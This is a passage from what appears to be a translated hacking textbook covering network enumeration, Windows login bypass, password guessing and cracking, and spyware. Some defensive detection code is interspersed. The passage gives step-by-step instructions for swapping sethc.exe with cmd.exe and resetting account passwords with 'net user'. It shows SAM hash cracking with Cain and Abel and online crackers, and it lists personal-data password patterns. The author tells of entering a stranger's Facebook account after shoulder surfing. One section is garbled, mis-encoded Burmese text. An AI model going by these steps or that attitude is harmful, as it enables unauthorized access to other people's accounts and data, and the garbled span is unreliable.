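        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def audit_banner(raw):
    """Return (header, issue, value) findings for one response head."""
    _, headers = parse_head(raw)
    findings = []
    for name, value in headers:
        if name in DISCLOSING_HEADERS:
            if VERSION_RE.search(value):
                findings.append((name, "version disclosed", value))
            elif name != "server":
                # A bare product name in Server is tolerated; the other
                # headers reveal the technology stack just by being present.
                findings.append((name, "technology disclosed", value))
        if name in ("location", "content-location") and TECH_EXT_RE.search(value):
            findings.append((name, "file extension reveals technology", value))
    return findings


if __name__ == "__main__":
    for label, raw in (("before", BEFORE), ("after", AFTER)):
        print(label, audit_banner(raw))
```

On Apache, ServerTokens Prod and ServerSignature Off produce the reduced Server header that passes this check, and expose_php = Off in php.ini removes the X-Powered-By header.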
CHAPTER 16: Enumeration

Introduction

Enumeration can be called the first attack launched against the target
network. It is placed within the Information Gathering steps because it
collects information about the target machine by actively connecting to
it. Enumeration means identifying systems, users and administrator
accounts. It also involves making an active connection to the target on
the local network in order to obtain information that can help the
attacker find vulnerabilities and devise exploits.

The information to be extracted during enumeration includes user names,
groups, computer names, MAC addresses, DNS records, SNMP information,
shares and so on.

Applications
The Domain Name System (DNS) works on UDP port 53, but that holds only
for client queries. If TCP port 53 is seen in action, you can tell that
a zone transfer is taking place. If it is not secured, DNS can leak all
the information involved in a zone transfer.

A client/server model application depends on the RPC service and TCP
135. RPC can reveal information about the clients connected to the
application server. NetBIOS is quite old, but it can still be used to
gather information through null sessions. In later Microsoft versions,
SMB runs on top of NetBIOS to maintain file sharing.

If we are using monitoring applications, it is most likely SNMP. Unless
it has been configured properly, for example by changing the default
community name, SNMP will disclose information. Active Directory relies
on LDAP to operate. LDAP left at its defaults is not secure, and if LDAP
is not secure an attacker will take all the information there is.

An SMTP server will answer every question we ask, provided we know how
to ask correctly. NTP synchronizes the time of all machines. Metasploit
code can be used to extract all the machine names. What has been
discussed here is only a rough summary.

NetBIOS
We already know that NetBIOS is an old technique that was used in
Windows 2000 & Windows XP. It has been left far behind and is of little
help with today's operating systems, but it can still disclose some
information.

The picture above shows Super Scan being used to scan one IP address,
192.168.10.2, as you can see. Super Scan can be downloaded from
bit.ly/kmn-ap. It is an .exe file and can be run on both Windows and
Linux. To use it on Kali Linux, put the downloaded SuperScan4.1.exe on
the Desktop, then open a terminal and simply type the following.

cd Desktop moves from the current Home directory into the Desktop
directory. wine is an app that can run the .exe files used on Windows.
SuperScan4.1.exe is the name of the file to open.

The result shows 3 UDP ports open, reported with the message UDP banner
grabbing (3 ports). (As it is a Windows application, it is more
convenient to use on Windows.)
On the Kali Linux that we use, a similar program is available right on
the command line (terminal). The tool to use is nbtscan.
What we should keep in mind is that NetBIOS is not an application in use
today. It dates from long ago, so it will not match later OS versions.

Next, a scan of the IP address of my Windows 7 machine is shown.
In SuperScan you will see the option tabs. Go to the tab called Windows
Enumeration. In the Hostname/IP/URL field that appears, enter your
target's hostname, IP or URL and try Enumerate. Here I entered 10.0.2.15
(the Windows 7 IP address).

You can try it and examine the results for yourselves.

Press the Clear button to erase what was found. Then press Options.
In the box that appears, tick the topmost checkbox, Use these
credentials, and fill in the account details. I am only showing a sample
test; the search is against training.com. Once the account details have
been filled in, press OK and run Enumerate again.

You will see information of this kind. With this much, I believe you can
go on experimenting with how to proceed. Let's move on to the next
topic.
SNMP
When searching for information, the Simple Network Management Protocol
(SNMP) can also serve as a good indicator. For example, if a Cisco
device is known to be running with a private string, its entire device
configuration can be downloaded, modified and uploaded again as a
malicious configuration.

If a Windows-based device is configured with SNMP, the patch level,
services running, last reboot times, user names, routes and other
information can be extracted. Querying over SNMP requires knowing the
MIB API. MIB stands for Management Information Base, which is used to
query the device and extract information.

Another point to watch is not to install Windows components that we do
not need. Even when one is needed, check carefully whether whoever holds
authorization could gain access through that program, and whether
backdoors could be created and used behind the scenes. It is the same as
adding extensions and plug-ins to a browser: careful checking is needed.
Measures such as not leaving community names at their defaults also need
to be in place.

Where SNMP has to be enabled, event logs should be monitored and traps
should be collected.

LDAP
LDAP (Lightweight Directory Access Protocol) is used to access
directories held by other services or within Active Directory.
Directories tend to mirror the structure of an organization and are
usually coupled with DNS for quick lookup and fast resolution. Normally
directories run on port 389.

If you have access to a user profile (e.g. user name, passwords, ..),
LDAP enumeration can be easy. It does not even require a highly
privileged account such as an Administrator account; having any ordinary
account in the target domain is enough.

Let's try this using Softerra. (There are not many tools for LDAP
hacking or LDAP enumeration.)

(Updated versions of the tools (applications) in this book are always
available at bit.ly-kmn-app.) What is used in the picture above is
Softerra's LDAP Administrator 2017. After installing and opening it, you
will see it as shown above. It is being demonstrated on Windows.
As in the picture, click the server and choose New Profile.
Give a Profile Name and continue with Next, and you will see the picture
below. The host's IP address goes in the Host field; the port, as
already discussed, is 389.
I entered the target IP in Host and DC=Training,DC=com in Base DN,
because the Training.com server is the one being scanned. Then I clicked
Next.

As the third step you will see the picture above. There are options
here. If we do not have even an ordinary account on the target server,
we can proceed as an Anonymous user. Here I will demonstrate with an
ordinary account that has no privileges at all, test@training.com.
After entering the user name and password correctly, you will see the
following picture.

Now click Next.

You will see it binding.

Under CN=Users we can see the user-related entries.

Only an ordinary account is needed to do this. It also works with no
account at all, but having an account yields more and better
information.

NTP
This is a protocol most of us already know: the Network Time Protocol,
created to synchronize the clocks of networked computers. In
vulnerability analysis or penetration testing, the data returned by
querying an NTP server is valuable and requires no authentication at
all, so attention is usually paid to it as well.
SMTP
The Simple Mail Transfer Protocol (SMTP) dates from around the time
computers first appeared. True to its name, SMTP is simple. For sending
and receiving email messages, SMTP is widely used together with POP3 or
IMAP. SMTP normally runs on port 25 and depends on the Mail Exchange
(MX) server.

VRFY, a commonly used command, can be installed easily with apt install
vrfy and can be used to validate users.

Its usage is as shown above, and the options that can be used are listed
under options. To look at each one in detail, call up man vrfy.

DNS Enumeration
DNS Enumeration can be described as the process of locating all of an
organization's DNS servers and their associated records. A company or
organization usually has internal and external DNS servers that can
record and store information such as user names, computer names and IP
addresses. The tools or programs that can be used for DNS Enumeration
are NSlookup, DNSstuff, the American Registry for Internet Numbers
(ARIN) and WHOIS.

Of these, NSlookup is both powerful and easy to use. It is included in
Windows, Linux & Unix, so it can be used directly from the Windows cmd
or from a Linux terminal. NSlookup can be used to find additional IP
addresses for servers & other hosts. We discussed earlier that
whois.net, whois.com/whois and who.is can also be consulted. Now let's
try NSlookup a little more on Windows, since its use in the Kali Linux
terminal has already been covered. It is the same in Windows cmd and in
a terminal; it is shown on Windows only for a change.

txufygyHkt& cmd udk zGifhjyD; nslookup vdkY &dkufxnfhvdkufygw,f/


vuf&Sd uRefawmf oHk;aewJh default server address udk 192.168.10.2 vdkY
jyaeygw,f/

Linux terminalrSm &dkufMunfhr,fqdk&ifawmh rdrdwdkY&JU IP address udk


jrif&rSmr[kwfyg/ 'gav;wpfckyJ uGmjcm;ygw,f/

yxr wpfaMumif;rSm set type=any vdkY ay;vdkufygw,f/ oabmu


rnfonfh yHkpHudkrqdk &,lr,f qdkwJh oabmaygh/ 'kwd,aMumif;rSm ls -d eJY server
udk -d (dump) jyKvkyfvdkufygw,f/ aemufrSmawmh uRefawmfwdkY&JU target domain
udk xnfhoGif;vdkufygw,f/

Linux terminal rSmawmh 'kwd,aMumif;rSm ls -d xnfhp&mrvdkygbl;/


domain udk wdkuf&dkuf &dkufxnfhEdkifygw,f/ rdrdwdkY&JU network access &&Sdxm;rIay:
rlwnfjyD; windows rSmvnf; ls -d eJY 0ifr&wm &Sdygvdrfhr,f/ zone transfer
aMumifhyg/
bmawG &vmrvJqdkwmudkawmh rdrdwdkYbmom prf;vkyfMunfhygcifAs/
NSlookup eJY ywfoufjyD; a&SUrSmvnf; aqG;aEG;cJhjyD;jyDrdkYvdkY 'DavmufeJYyJ
&yfem;yg&apcifAsm/ aemufxyf CHAPTER wpfckrSm System hacking tydkif;
Windows taMumif;udk qufjyD; aqG;aEG;&atmifyg/
CHAPTER 17: System Hacking - Windows

Introduction

Although this chapter is called System Hacking, let me state in advance that it will mainly discuss Windows systems. To this day, Windows is the most widely used OS on computers. You will even see that many people who use Macs install Windows on them. Since everyone already knows that nearly every office in our country uses Windows, I don't think it needs explaining why System Hacking focuses on Windows.

Password Attacks
Broadly, there are two kinds of password attack: social and digital attacks. In a social attack, the attacker tries to guess the victim's password using shoulder surfing (looking over someone's shoulder, or watching from somewhere nearby), dumpster diving (retrieving useful things from the rubbish bin, or searching through discarded files in places nobody thinks about) and SE (Social Engineering).

At this point the reader may well ask, "Isn't shoulder surfing just a kind of social engineering?" The answer has to be no. Why? First, we may be able to enter an office or company for one reason or another. In that case we can watch the victim, and shoulder surfing can also be used on Yangon's city buses or in places that offer free Wi-Fi. But what we must keep in mind is not to regard shoulder surfing as a sure way of getting a password, because the victim may or may not log in while we are watching.

For example, we may be using Facebook while riding a bus. Since we have not logged out, we use it without having to log in, so even if someone is watching, they can do nothing beyond noting our account. That is because most Facebook users log in once and do not usually log out. It is the same inside an office. Even if you get inside and can watch, the computer may already be on and in use by the time you arrive. So it is a method that cannot be said to work for certain.

But let me recount something I happened to experience. On a city bus in Yangon I saw a girl logging in to a Facebook account. Although I could not see the password itself, we know from the keyboard layout we use every day what happens when which key is pressed, so I was able to get into that account. I left an Only Me post telling her not to log in when she is not alone and that she should use Login Approval, and then logged out.
The next case is more important. Nowadays Mobile Banking and iBanking are widely used, so while things have become better, there are also more things to be careful about. Banks differ from one another in the methods they use. Among the mobile banking apps, I rather like CB Bank's Mobile Banking, because even if someone learns the pass code they cannot open it. Its weakness is only that you have to go back to the bank when you change phones or reinstall after the software breaks.

Of the other banks, I have used only Aya and KBZ, so let me give an example. The user field at login follows a formula, so it is easy to remember. (I won't say how it is set; those who have used it will easily know.) Just as with logging in to a mail account, anyone who knows the user and password can get in easily. Someone I once saw opened Mobile Banking on a bus, in the middle of a crowd, to check his balance. The user name and password were so easy to remember that I still remembered them three or four months later. While he was checking his own account, what I saw was over 20 lakh. (If someone were to see it and transfer it into some other account .......)

We take advantage of advancing technology and use it, but we tend to forget to pay attention to security. Let's continue. The shoulder surfing I discussed above was given as an example because you might think it is of no use anywhere, and you should also note the dos and don'ts for yourselves. (I have also heard many times of Facebook Page admins whose carelessness led to not only their account but also their Page being taken over in this way.)
Some people keep important things such as user names and passwords in notes. Those notes may be in a notebook or in the notes on a phone. On computers, I have also seen people who keep them in Sticky Notes. Dumpster diving means searching through those things as well.

Let's think about how a hacker could get into our office. First, he may be a friend of someone in the office (company), or he may be working there as a temporary employee. Some hackers, depending on the size of the job they are doing, wait patiently for months to obtain individual information. (Hackers are people with a great deal of perseverance.) What I said was months, mind you; it is not one month, and it does not run to years either. (At most about a year.) :)

In other countries, people boldly walk into a company with forged documents stating that they have been officially hired to do Internal Penetration Testing (at times when the responsible managers are absent or hard to reach) and work to get the information they want. Here, that is not easy to do.

After the social attack, the other kind is the digital attack. Digital attacks can be carried out with methods such as key loggers, password guessing, password cracking, brute force attacks and the use of rainbow tables. Each will be discussed in the appropriate place.

Password Guessing

Seeing this heading, the reader may smile. You may think that password guessing is a laughable part of hacking. But in real life, password guessing turns out to matter a great deal. To do password guessing effectively, you have to think on the basis of information about your target victim. Password guessing tools can also be used for this.

Password guessing means estimating the target's password, so there is no fixed method. But there are points to consider. At our target company or target organization, some of these may be in use without people realizing it. So let me discuss them one by one.

1. When we set a password, the first thing we consider is being able to remember it. (Otherwise we would forget it ourselves, which would not do.) So we tend to use only things we can remember as passwords.
2. Those of us who have security knowledge also have to consider being secure (memorable as in point 1, and secure as in point 2). But most people mainly go by point number one only.

The two points above give us things to think about and to guess. However, in basic password guessing the words may differ from country to country according to culture and way of life.

Let's discuss point number one first. We tend to think only of passwords that we ourselves can remember. This is a broad topic. Moreover, the way each person sets a password differs. So, when doing password guessing, the first thing to keep in mind is names.

Most people use name passwords. You may think that is bland and simple. But we really do use names, set together with some numbers. As a format it looks like this: "Name+Number". For example, khitminnyo123 (an example using my own name). The numbers may be the last digits of one's phone number, or one's birthday may have been put there.

To illustrate with the kind of passwords I have come across: for Name+Number, say the name is Aung Aung, the phone number is 09 123 456 789, the registration number is 062612, and the birthday is January 4, 1990. Thinking in the Name+Number pattern, his likely password would be among the following.
aungaung123
aungaung12345
aungaung789
aungaung123456789
agag123456789 (Ph.No.)
AgAg123456789
aungaung062612
aungaung4190 (4.1.1990)
aungaungjanuary4
and so on. I don't want you to memorize only the above. Guessing is more detailed than this. For example, the name part may not be the victim's real name but a nick name or company/organization name. It may be an alias, or the name of someone or something connected with the person: a pet's name, a lover's name, and so on. The place of birth is also sometimes used as the password name, though that is rare. In summary, when we set passwords we tend to use the Name+Number format so that they are easy to remember.

The second is the Name+Security pattern. The people from point 2 discussed above, who believe that special characters such as *#$@! should be used for security, tend to use symbols such as *#@. Using the same Aung Aung as the example:
aungaung*124#
@#$aungaung$#@
aungaung*#4190
aungaung@123456789 (Phone number)
and so on. These are sample password patterns that we should consider. There will also be people who use both Name+Number and Number+Name, where the name comes after the digits.

Another point: when setting passwords, we tend to use a phone number as the password. For example, 09 123 456 789, +959 123 456 789 and so on, with our own phone number in place of 123456789. Another: birthdays are also used as passwords. However, looking at Aung Aung from the example above, 4.1.1990 comes to only 411990 unless the dots (.) are counted in, so on systems such as Facebook that require a password of at least 8 characters it is usually used in a dot or zero form. For example, since Aung Aung's birthday is January 4, 1990,
1.4.1990
01041990
010490
1490
141990
and the like can be used. The forms used will vary. In places like Facebook that require at least 8 characters, forms longer than 8 characters can be used, and as discussed first, they may also be combined with the name. Where a PIN is used, 4 or 6 digits are most common, so the forms above tend to be used. The 6-digit registration number is also sometimes used.

Another thing to take into account in order to guess passwords is emotional words or phrases. We also tend to use feelings. For example: iloveyou, ilove(name), ilove(name)1500, *1500#, ihate(name),... and so on.

Here you may want to ask, "For password guessing you have to spend time producing lists. You may or may not get the right password, so isn't that a waste of time?" Yes. Hacking requires investing not only skill but also time, perseverance and motivation.

There are also tools for password guessing. TSgrinder and cupp are commonly used password guessing tools. They will be covered in the Wordlist Creation chapter. In practice, as the number of computers used at company or organization level grows, more repair work is needed, so you will find administrator passwords being set to ones that the IT team or computer specialist can remember. These are things that make password guessing easy. To be safe in your own workplace too, you need to take care that passwords are not of this guessable kind. For example, something like bmvmvm'gyJ is easy and hard to guess. (To make it easy to remember, it is memorized in Burmese. Try typing it as above where you type Burmese text.)
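
The closing advice above, that workplace passwords must not be of the guessable kind, can be enforced when a password is set. The following is an added example, not code from the book: a checker that rejects a candidate password built from the account holder's own name, phone number, registration number, birthday or the emotional phrases listed above. The profile field names and the `PAGE_EXAMPLE` record (the chapter's Aung Aung illustration) are assumptions of this sketch.

```python
import re
from datetime import date

MONTHS = ("january", "february", "march", "april", "may", "june", "july",
          "august", "september", "october", "november", "december")
PHRASES = ("ilove", "ihate")   # emotional prefixes listed in the chapter
MIN_DIGIT_RUN = 4              # shorter runs collide with unrelated numbers

# The chapter's illustrative person, used here as constructed sample data.
PAGE_EXAMPLE = {
    "names": ["Aung Aung"],
    "phones": ["09 123 456 789"],
    "id_numbers": ["062612"],
    "birthday": date(1990, 1, 4),
}


def name_tokens(names):
    """Each name run together plus each word of it, lower-cased."""
    tokens = set()
    for name in names:
        words = re.findall(r"[a-z]+", name.lower())
        tokens.add("".join(words))
        tokens.update(words)
    return {t for t in tokens if len(t) >= 3}


def date_tokens(born):
    """Day/month in both orders, padded or not, with a 2- or 4-digit year."""
    day, month = str(born.day), str(born.month)
    pairs = ((day, month), (month, day),
             (day.zfill(2), month.zfill(2)), (month.zfill(2), day.zfill(2)))
    years = (str(born.year), f"{born.year % 100:02d}")
    return {a + b + y for a, b in pairs for y in years}


def personal_info_findings(password, profile):
    """Return the sorted list of profile fields the password is derived from."""
    alnum = re.sub(r"[^a-z0-9]", "", password.lower())  # drops * # @ $ . padding
    digits = re.sub(r"\D", "", password)
    runs = {r for r in re.findall(r"\d+", password) + [digits]
            if len(r) >= MIN_DIGIT_RUN}
    found = set()

    if any(tok in alnum for tok in name_tokens(profile.get("names", ()))):
        found.add("name")
    for phone in profile.get("phones", ()):
        phone_digits = re.sub(r"\D", "", phone)
        if any(run in phone_digits for run in runs):
            found.add("phone")
    for number in profile.get("id_numbers", ()):
        number_digits = re.sub(r"\D", "", number)
        if number_digits and number_digits in digits:
            found.add("id_number")
    born = profile.get("birthday")
    if born:
        month = MONTHS[born.month - 1]
        words = {f"{m}{born.day}" for m in (month, month[:3])}
        words |= {f"{born.day}{m}" for m in (month, month[:3])}
        if (any(tok in digits for tok in date_tokens(born))
                or any(word in alnum for word in words)):
            found.add("birthday")
    if any(phrase in alnum for phrase in PHRASES):
        found.add("common_phrase")
    return sorted(found)


if __name__ == "__main__":
    for candidate in ("aungaung*#4190", "AgAg123456789", "T7#vq!Lm92xZ"):
        print(candidate, personal_info_findings(candidate, PAGE_EXAMPLE))
```

A non-empty result means the password should be refused at enrolment or reset; the check complements, and does not replace, a breached-password blocklist.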
Password Hashing & Encryption

This part will mainly discuss hashes. In the Windows OSes we are studying, you will find that two methods are mainly used for storing passwords. The old method is the LAN Manager hash, called the LM hash. It can store at most 14 characters and is easy to crack. That is why Windows versions from Vista onward no longer use the LM hash.

The LM hash stores the 14 characters split into two parts. Since it accepts only up to 14 characters, that means two parts of 7 each. The two parts are encrypted separately, but when stored as a hash the two are combined and kept as a single hash. That is why the whole thing became easy to crack. That is the old version, the LM hash.

So what is the new method we use now? From Windows Vista onward, the LM hash is disabled and another method is used: the NT hash, which can hold up to a maximum of 127 characters. Although what we use today is the LM hash, I understand that some organizations such as banks (where my teachers have carried out penetration tests) still use only the NT hash instead of the LM hash, for the sake of compatibility with every system.

Where do the Windows OSes most used in our workplaces store passwords? In the SAM database. On an Active Directory server, passwords are stored in the AD database. When these databases are copied or stolen, the passwords are exposed, because the SAM database can be copied and the passwords recovered using tools such as John the Ripper or Cain and Abel.

Using this method, you can also help friends who have forgotten their password get sorted out without having to reinstall Windows. As for how: boot into Kali Live Mode, copy the SAM database, and then recover it on your own machine with tools such as Cain and Abel. How to use Cain and Abel is discussed next.
Cain and Abel
If asked to show a cracking tool that is both easy to use and good, I would have to show Cain and Abel. The apps in this book are collected at bit.ly/kmn-app and can be downloaded from there.

Open Cain and Abel and open the option called Cracker, and you will see it as in the picture above.

First, click and select LM & NTLM Hashes under Cracker. It is marked 1 in the picture. Then, if the blue plus sign at the place marked 3 is greyed out rather than lit, click in the white area under user name, marked 2, and the blue plus will appear. As in the picture, click the blue plus that has appeared at the place marked 3.

As in the picture above, an option box called Add NT Hashes from will appear. If you click Next leaving the default, without choosing anything, it will find and fill in the users on the current computer; import hashes from a test file is for when you want to recover hashes from a .txt file. If you want to recover from a file copied from a SAM database, choose the third option, Import Hashes from a SAM database. For now I will show only the default. Once you have copied a SAM database, it is easy to do yourself.

I will now demonstrate only with the accounts of the machine I am using. So there is nothing to choose; just click Next with the topmost option it offers.

You can stretch the LM hash and NT Hash columns to view them.

You will see that the LM hashes are all identical. What I am demonstrating is on Windows 7, and you probably remember that I mentioned earlier that Windows versions from Vista onward no longer use the LM hash.

These are the user accounts currently on my computer. Looking there, you will see that the Administrator account is the one named root. The rest are only standard users, and you can see that the Guest account is turned off.

This is a close-up of my Windows system user accounts as seen in Cain and Abel (CA). You already saw in the previous picture that the Administrator account goes by the name root. Here they are shown one by one, but note that they are the same. Because it is Windows 7 and the LM hash is no longer used, it shows empty under LM password; no password is in use there. Under NT password, the administrator account named root and the guest account are empty (no password). For the remaining three accounts, KMN, Test1 & Test2, you will see that passwords exist.

To recover a password, right-click and you will find three choices: Dictionary Attack, Brute-Force Attack and Cryptanalysis Attack. Each of them has further choices.

For Dictionary Attack.

This is what Brute-Force Attack contains, and you will see that the further choices are the same.

In Cryptanalysis Attack there are more additional choices, and you will find that it also includes cracking by building Rainbow Tables. In Cryptanalysis Attack, for NTLM Hashes you will find only two ways of using rainbow tables, OphCrack and RainbowCrack. For the demonstration now, choose NTLM Hash under Brute-Force.

As Predefined you will see many choices: a-z and digits? a-z, A-Z & numbers? a-z & special characters (*&^%$#@!....)? and so on. I will demonstrate with the third one. The password I set for testing contains no capital letters, so I did not select them. This method is certain, but the time it takes can be very long, depending on the password that was set.

In the Brute-Force attack box above, Min at the top right is the minimum password length we will start from. (Some people set even a single character such as a.) There you must set the minimum and maximum lengths. Then press Start to begin the attack.

This picture shows the attack in progress (as in my demonstration). (It has to be done one account at a time.)

Once all the passwords have been obtained, they will be shown under the NT Password column. You can stretch the column to view it.

If what we want are the passwords of the accounts in a SAM database we have copied, then at the first step we should click as in the picture above and select the SAM database. The rest is the same, so I won't show it again. The time brute force takes depends on how difficult and how long the password is, and also on the performance of the computer. On supercomputers the time taken is much less.
Because some cracking tools could crack passwords quickly, Microsoft changed to a more secure system. Starting with Windows NT 4 Service Pack 3, SysKey was added to security. It added a further layer of 128-bit encryption to the SAM database. The aim was that even if hackers stole the SAM database, they could not open it without the SysKey. Hackers in turn invented tools such as BKhive in order to decrypt the SAM database again. Cain and Abel is also one of them.

If I were to name a better mitigation technique, it would be to keep the SysKey not on the local system but moved somewhere else. But because the only place it can be moved to is a floppy disk (which nobody uses nowadays), it has no effect. Microsoft has not updated it to this day either. One can hope that it would be better if it could be moved to something like USB.

There is also a place where the NT hashes obtained from Cain and Abel, as discussed, can be checked online. It checks against the databases it already holds, so if the passwords our victim has set are present there, they can be obtained very quickly. To try it, open Cain and Abel. Then proceed as at the beginning until the user accounts appear. This was discussed above, so I won't elaborate. Then right-click and choose Export. Alternatively, you can look at the NT hashes and type them into another file. Exporting is faster, of course.

Choose for yourself where to save the file, give it a name and save it. I will just put it on the Desktop. Then open the file you saved with notepad. On Kali you can open it with Leafpad or Gedit. There you will see the hashes of the user accounts. You will see the hashes shown separated by ":", and the part after the ":" is the NT hash.

Copy that latter part.

Then type hashkiller.co.uk in the browser and go there.

On the site that appears, choose NTLM Hash from the Decrypter/Cracker tab. (What we are using is for NTLM hashes. If you want to check MD5, you can look under MD5.)

Paste the hashes copied just now into the NTLM hashes field, as in the picture above. Then go to near the bottom of the page and fill in the Captcha correctly.

Fill in the given captcha correctly and press Submit.

If the hash we are looking for is already in the site's database, you will see it as above. In Status you will see green text saying we found 1 hashes.

On the right-hand side you will see the result for the NTLM hash we looked up. In the example I am showing, the hash is 7259353E59427CE240391DB8893DA4E0 and the result is khitminnyo. Since the user account looked up in the example is KMN, it is now possible to get into the user account KMN on that computer with khitminnyo (the password).

If the status shows Failed to find any hashes! as above, it means that the hash we are looking for is not yet in hashkiller. I think that is enough to get the idea. Let's move on.

Windows 7 User Account without Passwords


In truth, there are quite a few other things that ought to be discussed before this topic. So please note in advance that you should not take the topics discussed under this chapter as all there is to this subject.

Suppose we have got hold of a Windows 7 computer. We absolutely need to get into it, and we do not know the password. (A forgotten password is the same situation.) If we also have another computer and the accessories for removing the hard disk and using it as an external drive, the easiest way is to remove the HDD, make it external, attach it to the other computer and copy the data from it; but in a situation where there is no other computer, getting into the machine becomes necessary.

The picture above shows the user account on the Windows computer I will get into as an example. You will see that it is named Hack Me and has a password set. To get in without knowing the password, you have to work until startup repair appears. Desktop computers have a restart switch, so it can be done from there; on some laptops, when you reach the login screen, hold the power button down to turn it off and on again, and when you reach the login screen again, hold it down and turn it off again, until Launch Startup Repair appears. On some computers you can get in by pressing F8 quickly and repeatedly.

If getting in as described above proves difficult, you need a Windows 7 installer Disc.

Insert the disc and proceed as normal. Without clicking Install now, click Repair your computer, and you can get into startup repair.

As above, you may also have to go via system recovery options.

As above, go on into View problem details. You will see the line of text marked with an arrow in the picture below. When you click the link marked with the arrow,

from the Notepad that opens, do File >> Open. File explorer will then appear, and from there go on into Windows >> System32.

As in the picture, find the file named sethc in the system32 folder, R-click, rename, and change the name to sethc1. (You can change it to whatever you like. I just added one to make it easy to find again.)

Then, in the same system32 folder, find the file called cmd. Copy & paste it, and name the resulting file sethc. (If file extensions are shown you will see cmd.exe, and the name of the copied file must be changed to sethc.exe. If you see only cmd, the copied file should be named just sethc.) When everything is done, click X and exit. Then restart the computer. The computer will start up again and reach the login screen as normal.

At the login screen, press the Shift key five times quickly on the keyboard. In the command prompt that appears, type net user and you will see the user accounts that currently exist.

On the computer I am demonstrating with, you will see it as in the picture above. Administrator is to be used only if an account was set up under that name; on my computer, as I explained above, the account named root is the administrator account. Now I will get into the account called Hack Me.

The command to use is net user AccName *. The account name I am demonstrating with, Hack Me, contains a space, so it is written inside quotation marks as "Hack Me". If you want to get into and change the account named root, you would just write net user root *. When you press enter, the line Type a password for the user: will appear. If you press enter without typing anything, the password on the Hack Me account (the account we want to get into) is removed. Now you can get in. :)
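
The swap described above leaves two artefacts a defender can check for: sethc.exe has the same content as cmd.exe, and a renamed copy such as sethc1.exe sits next to it. The following is an added example, not part of the book: a check that can be run against a live System32 folder or against the same folder on a mounted disk image. Covering the other logon-screen accessibility programs goes beyond the sethc case in the text, and the rename check is a heuristic whose hits need manual review; the demo directory and its file contents are constructed.

```python
import hashlib
import tempfile
from pathlib import Path

# sethc.exe is the file replaced in the text; the other names are an added
# generalization to the accessibility programs reachable from the logon screen.
ACCESSIBILITY = ("sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                 "narrator.exe", "displayswitch.exe")
SHELLS = ("cmd.exe",)


def sha256_of(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_logon_screen_hijacks(system32):
    """Return (file name, reason) pairs for signs of the swap in a System32 folder."""
    files = {p.name.lower(): p for p in Path(system32).iterdir() if p.is_file()}
    shell_hashes = {sha256_of(files[s]): s for s in SHELLS if s in files}
    findings = []
    for name in ACCESSIBILITY:
        # Sign 1: the accessibility program is byte-for-byte a command shell.
        if name in files:
            shell = shell_hashes.get(sha256_of(files[name]))
            if shell:
                findings.append((name, "identical to " + shell))
        # Sign 2 (heuristic): a leftover renamed original, e.g. sethc1.exe.
        stem = Path(name).stem
        for other in sorted(files):
            if (other != name and other.startswith(stem)
                    and Path(other).suffix in ("", ".exe")):
                findings.append((other, "possible renamed copy of " + name))
    return findings


def demo_findings(tampered=True):
    """Build a constructed stand-in for System32 and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "cmd.exe").write_bytes(b"constructed stand-in for cmd.exe")
        (root / "utilman.exe").write_bytes(b"constructed stand-in for utilman.exe")
        original = b"constructed stand-in for sethc.exe"
        if tampered:
            (root / "sethc1.exe").write_bytes(original)
            (root / "sethc.exe").write_bytes((root / "cmd.exe").read_bytes())
        else:
            (root / "sethc.exe").write_bytes(original)
        return find_logon_screen_hijacks(root)


if __name__ == "__main__":
    for name, reason in demo_findings():
        print(f"{name}: {reason}")
```

Because every step of the swap needs offline access to the system volume, full-disk encryption and a firmware password that blocks booting from external media address the cause, while this check only detects the result.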

What I want to point out is that if we have just a Kali Linux Live Mode USB stick, we do not even need to break in as in the methods above. Plug the usb into that computer, boot into Live Mode, and the information needed can be taken out. When it is not our own computer, we do not know the password, and there are files on it that we absolutely must copy (at a time when the owner cannot be reached), the files can be retrieved with Live Mode, so we get what we want, the owner's user account information is not damaged, and there is no longer any need to spend time cracking the password.

Creating Rainbow Tables on Windows


This time, let's discuss how to build rainbow tables on Windows. Back in Cain and Abel, you may have noticed that rainbow tables can also be used for cracking passwords. Cracking was demonstrated there using password lists. Cracking with rainbow tables follows the same procedure. Rainbow tables can be built in advance.

Word list files can also be created in advance, but the weakness of a wordlist is that the more complete it becomes, the bigger the file size. The more characters, the larger the size, to the point where it may become impossible to store on our computers.

In the picture above you will see the size that results from generating the complete set for passwords from 8 up to 20 characters. (On Kali Linux, word lists can be created using the crunch command.) Files as large as the above cannot be stored on our computers. So in this kind of situation (where the victim's password is not in the wordlist we are using), rainbow tables can be used to get a complete set of words in a small amount of space.

Let's create rainbow tables on Windows. The Cain and Abel we installed includes a program that was added during installation: the Windows Rainbow Table Generator, known by the abbreviated name winrtgen. You can find it from start menu >> search. Open winrtgen. Then create a new one from Add Table.

Then, under Hash choose the hash you will use; Min Len is the minimum number of characters and Max Len is the maximum number of characters. Under Charset (Character Set) you can choose as you wish whether to include lowercase letters, uppercase letters, digits and special characters. I left it as all-space (default), because I want everything included. Then look at the Disk space shown below. My wordlist just now was also 8-20, and this rainbow table is 8-20 as well. The file size, however, is now very different. You will see Disk space 610,35 MB. Click OK >> OK.

You will see the rainbow table being generated as above. You do have to wait some time.

If you want to create rainbow tables on Kali Linux, you can do so with rainbowcrack (rtgen). In truth there is a great deal more to discuss, but for now let me pause here.
CHAPTER 18: Spyware and Keyloggers

Introduction

Hackers have long used spyware and keyloggers to collect information, and they are still in use today. In this chapter I intend to cover them as completely as I can, so let me ask in advance for your patience: there is a little more to read.

What is spyware? Spyware is a kind of software (program) that can run in stealth mode (operating invisibly). Because it works in the background, it is hard to know whether or not spyware is present on our computer systems. Spyware is also called a spybot or tracking software. Spyware is used to record and collect sensitive information, such as the information stored on our computers and the data we enter while using them.

Spyware can also be used to log keystrokes such as the passwords, user names or e-mail addresses we type when logging in. A program can be written to record these for selected major sites such as Gmail, Yahoo mail and Facebook, or for every web page login. As technology advances, this has become a point that deserves special attention for large businesses that rely on internet-based services such as i-Banking.

Spyware can be relied on like a cheap private investigator. If some screen-capture software is installed on our computer, spyware can combine with it to record what we do as screenshots, and it can also send them to the spyware owner. If our computers have a web cam attached or built in, spyware can use that web cam to take camera recordings as well.

There is one difference between legitimate tracking software and spyware. Legitimate tracking software is something we install ourselves, with our own knowledge, whereas spyware takes up residence in our computer systems without our knowing.
